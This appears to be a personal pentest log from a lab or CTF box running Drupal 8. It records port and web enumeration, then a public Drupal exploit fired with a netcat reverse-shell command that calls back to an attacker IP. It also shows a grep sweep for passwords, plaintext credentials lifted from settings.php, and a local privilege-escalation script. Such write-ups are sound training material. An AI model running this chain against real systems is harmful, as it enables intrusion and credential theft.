websrv01

๐Ÿงช Pentest Log: {{date:2025-08-31}}

๐Ÿ” Target Information

ip=10.11.2.243

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 25

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip
Drupal 8

Google for exploit, found

https://www.exploit-db.com/exploits/46459

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

python3 /home/kali/Documents/Shell\ Handler/penelope/penelope.py -p 80

python3 46459.py http://$ip/ "busybox nc 172.16.1.3 80 -e /bin/bash"

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Credential Find:

find . -type f -exec grep -iIl -- "password" {} + 2>/dev/null

Found

./sites/default/settings.php
  'username' => 'drupalmanager',
  'password' => 'Drup@lM@nager',
ssh drupalmanager@$ip

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

searchsploit -m https://www.exploit-db.com/exploits/46996

chmod +x ./46996.sh
./46996.sh
bgmwgo01xiiinumbb1cd